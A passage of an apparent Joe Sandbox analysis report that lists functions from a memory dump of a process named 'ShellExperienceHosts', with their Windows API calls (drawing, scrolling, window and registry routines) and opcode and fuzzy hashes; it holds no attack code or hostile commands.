Opcode ID: 6a5c1fdbfd10796f0852a7d593c90b109de2877cd6ebf2db66231364b0b01e0f
Instruction ID: ce6e823ebbe0a49fefd3925fb1b2656481ea0591247c2ef58ec8b9ac21d4da7b
Opcode Fuzzy Hash: 6a5c1fdbfd10796f0852a7d593c90b109de2877cd6ebf2db66231364b0b01e0f
Instruction Fuzzy Hash: 91515B32700605ABCB109B75D848BDEB7BCFF26318F144569E91AA3B80DB70E844CB97

Function 6CA3ABB7 Relevance: 6.2, APIs: 4, Instructions: 177COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CA3ABBE
LoadImageW.USER32(?,?,00000000,00000000,00000000,00002000), ref: 6CA3AD14
GetObjectW.GDI32(00000000,00000018,?), ref: 6CA3AD26
DeleteObject.GDI32(00000000), ref: 6CA3AD7E

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Object$DeleteH_prolog3ImageLoad
String ID:
API String ID: 91933946-0
Opcode ID: 7b7a8f76e0ddb2e14ceb4fc75287959364cf33ae399701bd8ba90304223992af
Instruction ID: 542fd82f9b8804f4d8f2c7a09632089ba7190b610d5b782c552a777e69192e85
Opcode Fuzzy Hash: 7b7a8f76e0ddb2e14ceb4fc75287959364cf33ae399701bd8ba90304223992af
Instruction Fuzzy Hash: B461E3319006218BDF02CFA4C9907EE77B2BF55314F249269EC19AF685CB309D89CBA0

Function 6C9C3DCC Relevance: 6.2, APIs: 4, Instructions: 158COMMON

Download Yara Rule

APIs

Part of subcall function 6C9C49AD: GetDlgCtrlID.USER32(?), ref: 6C9C49BB
Part of subcall function 6C9C49AD: IsChild.USER32(?,?), ref: 6C9C49C9

GetScrollPos.USER32(?,00000002), ref: 6C9C3E15
GetScrollPos.USER32(?,00000002), ref: 6C9C3E41
SetScrollPos.USER32(?,00000002,00000000,00000000), ref: 6C9C3E9E
SetScrollPos.USER32(?,00000002,00000000,00000000), ref: 6C9C3F20

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Scroll$ChildCtrl
String ID:
API String ID: 656700424-0
Opcode ID: 55003886a63d8e19b7ca87bd6b28a965af6930b3d946966b0ebecca337068971
Instruction ID: c8e2294e9ccf46ff961d19e0609971528cde6f51e3a48ea510ef864925048572
Opcode Fuzzy Hash: 55003886a63d8e19b7ca87bd6b28a965af6930b3d946966b0ebecca337068971
Instruction Fuzzy Hash: 0A516C31B00229AFDF158F68C855BBEBBB9FF48710F10416AE916A7790CB70A901DB91

Function 6C9C3F82 Relevance: 6.2, APIs: 4, Instructions: 151COMMON

Download Yara Rule

APIs

Part of subcall function 6C9C49AD: GetDlgCtrlID.USER32(?), ref: 6C9C49BB
Part of subcall function 6C9C49AD: IsChild.USER32(?,?), ref: 6C9C49C9

GetScrollPos.USER32(?,00000002), ref: 6C9C3FCB
GetScrollPos.USER32(?,00000002), ref: 6C9C3FF7
SetScrollPos.USER32(?,00000002,00000000,00000000), ref: 6C9C4054
SetScrollPos.USER32(?,00000002,00000000,00000000), ref: 6C9C40C9

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Scroll$ChildCtrl
String ID:
API String ID: 656700424-0
Opcode ID: 2786e97b54e3cc509c8f8510c0c5301ea74689714dc8faccb71a6f76e42847c0
Instruction ID: d0eea4e62a4b403553b59f396a5bcb341416b04a3d598a3bcb108814cd33d933
Opcode Fuzzy Hash: 2786e97b54e3cc509c8f8510c0c5301ea74689714dc8faccb71a6f76e42847c0
Instruction Fuzzy Hash: DB510975B00219EFDF15CF54C945BBEBBB6BF98310F10405AE815A7290DB71AA01DF92

Function 6C9E2186 Relevance: 6.1, APIs: 4, Instructions: 144registryCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6C9E2190

Part of subcall function 6C9CDCB4: RegCloseKey.ADVAPI32(00000000), ref: 6C9CDD59
Part of subcall function 6C9CDCB4: RegCloseKey.ADVAPI32(00000000), ref: 6C9CDD68

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 6C9E2315
RegCloseKey.ADVAPI32(?), ref: 6C9E2328
RegCloseKey.ADVAPI32(?,00000000,00000000,0002001F), ref: 6C9E2382

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Close$EnumH_prolog3_Value
String ID:
API String ID: 431837299-0
Opcode ID: 2340a2c2548d21464c2f30f06b13446810660d0a0d1424d5bfbe6359d9629fce
Instruction ID: ad53cb54a881579e502d8ab34ca762d74982bd7f4fb10b9c3413b982b6aa66d3
Opcode Fuzzy Hash: 2340a2c2548d21464c2f30f06b13446810660d0a0d1424d5bfbe6359d9629fce
Instruction Fuzzy Hash: 595122B1A011299BCB21CF54CC88ADEBBBCEF59714F4001DAE609A7651DB709F89CF94

Function 6C9DDCD4 Relevance: 6.1, APIs: 4, Instructions: 117COMMON

Download Yara Rule

APIs

GetStockObject.GDI32(00000000), ref: 6C9DDCFC

Part of subcall function 6C9D845D: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,?), ref: 6C9D84A4
Part of subcall function 6C9D845D: CreatePatternBrush.GDI32(00000000), ref: 6C9D84B1
Part of subcall function 6C9D845D: DeleteObject.GDI32(00000000), ref: 6C9D84BD

GetSystemMetrics.USER32(00000020), ref: 6C9DDD3D
GetSystemMetrics.USER32(00000021), ref: 6C9DDD49
InflateRect.USER32(?,000000FF,000000FF), ref: 6C9DDDAB

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: CreateMetricsObjectSystem$BitmapBrushDeleteInflatePatternRectStock
String ID:
API String ID: 419749085-0
Opcode ID: 8c7c8cb0cbb4cc26bcbd7cbef588297cbf223d69bc999c179d51677c1b72baf5
Instruction ID: b7e43eac71222c62c7ec6fd6b80f6d25ef71a9d688916733074a274c6ac37404
Opcode Fuzzy Hash: 8c7c8cb0cbb4cc26bcbd7cbef588297cbf223d69bc999c179d51677c1b72baf5
Instruction Fuzzy Hash: 6F415872D00A19DFCF04CFA4C944AEEBBB5EF49314F228159E914BB661D730A946CFA0

Function 6C9CDF74 Relevance: 6.1, APIs: 4, Instructions: 117registryCOMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(?,?,6CB316B0,?,00001000,?), ref: 6C9CE0C1

Part of subcall function 6C9CE0F3: RegCloseKey.ADVAPI32(00000000,?,?,?,6C9CDE02,?,00000000,00000018), ref: 6C9CE138

RegQueryValueExW.ADVAPI32(00000000,?,00000000,?,00000000,?,?,00000000,3E6EA3C2,?,?,?,?,6CB21E37,000000FF), ref: 6C9CE00F
RegQueryValueExW.ADVAPI32(00000000,?,00000000,?,00000000,?,?,?,?,?,?,6CB21E37,000000FF), ref: 6C9CE04B
RegCloseKey.ADVAPI32(00000000,?,?,?,?,6CB21E37,000000FF), ref: 6C9CE065

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: CloseQueryValue$PrivateProfileString
String ID:
API String ID: 2114517702-0
Opcode ID: 140d7689e38ad207ea90ee26e5b03974882ef8ae1e59af618faf979e1a5b4e44
Instruction ID: 7faed352bea37463ce684519e13ec5d8eaa4f877b0be58ee7d753ede84f76ac6
Opcode Fuzzy Hash: 140d7689e38ad207ea90ee26e5b03974882ef8ae1e59af618faf979e1a5b4e44
Instruction Fuzzy Hash: 0C414F71A04219EFDB25CF14CC48AEEB7B8EF14314F0041AAE419A3681DB34DE59DFA2

Function 6C9C67AB Relevance: 6.1, APIs: 4, Instructions: 112windowCOMMON

Download Yara Rule

APIs

EnableMenuItem.USER32(?,00000000,00000403), ref: 6C9C686E
GetFocus.USER32 ref: 6C9C6888
GetParent.USER32(?), ref: 6C9C6893
SendMessageW.USER32(?,00000028,00000000,00000000), ref: 6C9C68A8

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: EnableFocusItemMenuMessageParentSend
String ID:
API String ID: 2297321873-0
Opcode ID: 765845817dd939c90c7323287bc6c4c77a82e911ae20c2707427c0e39ac3607f
Instruction ID: 14270f7efb3dd10c42a8aea9c1a39b42adf3bc98cdec33d50a2ba7bbfd90dbe9
Opcode Fuzzy Hash: 765845817dd939c90c7323287bc6c4c77a82e911ae20c2707427c0e39ac3607f
Instruction Fuzzy Hash: DD41D031700604EFDB209F65C888B6ABBB9FF95318F10826DE416D7A90CB70E944CBD2

Function 6C9F456B Relevance: 6.1, APIs: 4, Instructions: 111windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 6C9F4604
ScreenToClient.USER32(000000FF,?), ref: 6C9F4614
PtInRect.USER32(000000D8,?,?), ref: 6C9F4627
PostMessageW.USER32(000000FF,00000010,00000000,00000000), ref: 6C9F4642

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: ClientCursorMessagePostRectScreen
String ID:
API String ID: 1913696736-0
Opcode ID: d050b261ab3ec24435a9842ecfef98ae1e2d45f71c14f5e4163a7536211ebfff
Instruction ID: dbb1b10b5263da66de3c8eb13ff6fcd08187e71217174347241b908e185bdec5
Opcode Fuzzy Hash: d050b261ab3ec24435a9842ecfef98ae1e2d45f71c14f5e4163a7536211ebfff
Instruction Fuzzy Hash: D9311235B0065AEFCF019F64D944AAD7BB9FF48364F214166E829E7650DB30D902DF90

Function 6C9DED66 Relevance: 6.1, APIs: 4, Instructions: 108windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6C9DED6D
GetClientRect.USER32(6CB321C4,?), ref: 6C9DEDBC

Part of subcall function 6C9B992F: GetScrollPos.USER32(?,?), ref: 6C9B995B

Part of subcall function 6C9D3F25: GetModuleHandleW.KERNEL32(uxtheme.dll), ref: 6C9D3F34
Part of subcall function 6C9D3F25: GetProcAddress.KERNEL32(00000000,BufferedPaintInit), ref: 6C9D3F44
Part of subcall function 6C9D3F25: EncodePointer.KERNEL32(00000000), ref: 6C9D3F4D

CreateCompatibleDC.GDI32(?), ref: 6C9DEE58
CreateCompatibleBitmap.GDI32(?,?,?), ref: 6C9DEE7E

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: CompatibleCreate$AddressBitmapClientEncodeH_prolog3HandleModulePointerProcRectScroll
String ID:
API String ID: 1015973060-0
Opcode ID: 5f780a5e7f23397ab9a0ba8c03cf8e8415bc566fecca5480c2d55edac61fe5ae
Instruction ID: a763ab5a3149b8716e9665684aa80b0c2bac0817673905defb70925efb8ed81e
Opcode Fuzzy Hash: 5f780a5e7f23397ab9a0ba8c03cf8e8415bc566fecca5480c2d55edac61fe5ae
Instruction Fuzzy Hash: EF412BB1600A06AFDB00CF65C984AA9FBB9BF18308B05852DE51DA7E51D730F954CFA2

Function 6C9B9CD4 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

Part of subcall function 6C9BE4F7: GetWindowLongW.USER32(00000004,000000F0), ref: 6C9BE504

GetClientRect.USER32(?,?), ref: 6C9B9D3C
IsMenu.USER32(00000000), ref: 6C9B9D78
AdjustWindowRectEx.USER32(?,00000000,00000000,?), ref: 6C9B9D90
GetClientRect.USER32(?,?), ref: 6C9B9DD8

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Rect$ClientWindow$AdjustLongMenu
String ID:
API String ID: 3435883281-0
Opcode ID: 13fb67d8b268e644b9202697b9fab1f52ae2385c995a7a7e1fece2f3f799f088
Instruction ID: e0b38c2c53b14e9abbfdf3e05f7e744a830cd3f312ee7acc83039240761d1a1c
Opcode Fuzzy Hash: 13fb67d8b268e644b9202697b9fab1f52ae2385c995a7a7e1fece2f3f799f088
Instruction Fuzzy Hash: 26318171A00249AFDB10DBB5C998EBFBBBDEFA5218F154159F805B7A40DB30E944CB90

Function 6CA3E7C0 Relevance: 6.1, APIs: 4, Instructions: 96COMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 6CA3E7F7
GetWindowRect.USER32(?,?), ref: 6CA3E838
GetClientRect.USER32(?,?), ref: 6CA3E84F

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Rect$ClientEmptyWindow
String ID:
API String ID: 742297903-0
Opcode ID: 4c1b456d04618701138036fb96c8446b3a3115e71f92fabb209d27797cbc41e8
Instruction ID: 1c4f515a6e7a3ec65a6310d869b6fa0982813ceb4f2122d06de8f2890dd9bd57
Opcode Fuzzy Hash: 4c1b456d04618701138036fb96c8446b3a3115e71f92fabb209d27797cbc41e8
Instruction Fuzzy Hash: 1F313775B0021ADFCB04DF24C998AAEBBB5FF49314B148169E81AEB741C730ED41CBA1

Function 6C9C6525 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

InflateRect.USER32(?,?,?), ref: 6C9C65B7
GetWindowRect.USER32(?,?), ref: 6C9C65CB
GetParent.USER32(?), ref: 6C9C65D4
EqualRect.USER32(?,?), ref: 6C9C65F3

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Rect$EqualInflateParentWindow
String ID:
API String ID: 719057501-0
Opcode ID: df979b5c30a6c4589056fb7def2a20b2696e0c936c3485abb4f7fc29177cd53d
Instruction ID: 475993b5deace5e3c1b7bec47f2d781845c9e4634b06aa6ec4cb44cc213c3d70
Opcode Fuzzy Hash: df979b5c30a6c4589056fb7def2a20b2696e0c936c3485abb4f7fc29177cd53d
Instruction Fuzzy Hash: 06312171B01249ABCF00DFA4C944AEEB7F9FF59308F20452AE506E3640DB31EA55CB62

Function 6C9C4BE7 Relevance: 6.1, APIs: 4, Instructions: 81COMMON

Download Yara Rule

APIs

RedrawWindow.USER32(00000041,?,?,00000041), ref: 6C9C4C0A
InflateRect.USER32(?,000000FF,000000FF), ref: 6C9C4C4D

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: InflateRectRedrawWindow
String ID:
API String ID: 3190756164-0
Opcode ID: 09f257dfba980a3884ca62efd8e730cf9229389560c436e5d000e49f7dbe6857
Instruction ID: b02873094866513722ca1a7f2334080e4c7c849f26d2ffe14db1d7bb6246e848
Opcode Fuzzy Hash: 09f257dfba980a3884ca62efd8e730cf9229389560c436e5d000e49f7dbe6857
Instruction Fuzzy Hash: C8213071B0210AEBCF01DFA4DD84CEE7779EB16328B21432AF521A76D0D73599198F21

Function 6C9F4371 Relevance: 6.1, APIs: 4, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 6C9F4393
PtInRect.USER32(?,?,?), ref: 6C9F43BD

Part of subcall function 6C9F2758: ScreenToClient.USER32(?,?), ref: 6C9F2774
Part of subcall function 6C9F2758: GetParent.USER32(?), ref: 6C9F2784
Part of subcall function 6C9F2758: GetClientRect.USER32(?,?), ref: 6C9F2817
Part of subcall function 6C9F2758: MapWindowPoints.USER32(?,?,?,00000002), ref: 6C9F2829
Part of subcall function 6C9F2758: PtInRect.USER32(?,?,?), ref: 6C9F2839

MapWindowPoints.USER32(?,?,?,00000001), ref: 6C9F43E6
SendMessageW.USER32(?,00000202,?,?), ref: 6C9F4405

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Rect$Client$PointsWindow$MessageParentScreenSend
String ID:
API String ID: 2689702638-0
Opcode ID: d6b689e0f7ce9948f21cff9f2482023f8e0475ddd7be48e0b903783ff08a69f0
Instruction ID: c8189ccc2f5d82c41ff8f4ea2f8284364e097989b5065c95cfb21ca16d101337
Opcode Fuzzy Hash: d6b689e0f7ce9948f21cff9f2482023f8e0475ddd7be48e0b903783ff08a69f0
Instruction Fuzzy Hash: A131BF31600649EBCF129F61CD049AE7BFAFF49714B10812AF86AA7550EB30E912DF50

Function 6CAFAF7C Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da8c8a81553aad59c113b90525ea3837b3ccc0e585e653f54245bc9f37f8e230
Instruction ID: 18015197b255f555435ed10c0d8ac4a09a509c0eb5f94e19e65f966f30536b11
Opcode Fuzzy Hash: da8c8a81553aad59c113b90525ea3837b3ccc0e585e653f54245bc9f37f8e230
Instruction Fuzzy Hash: F321A171304205AFA7109F66E84498F77BDEF113AC7088B28F875D7A80D730ED868BA0

Function 6CB06A4F Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3279e268b00249dcc59e276925c40f5f4fae842c55f4ffce8b74c3798184a3e7
Instruction ID: bb6edbd2f547405f0879d88f9ccadeecfcc82fbef0f56d0d09169bf2a49addd0
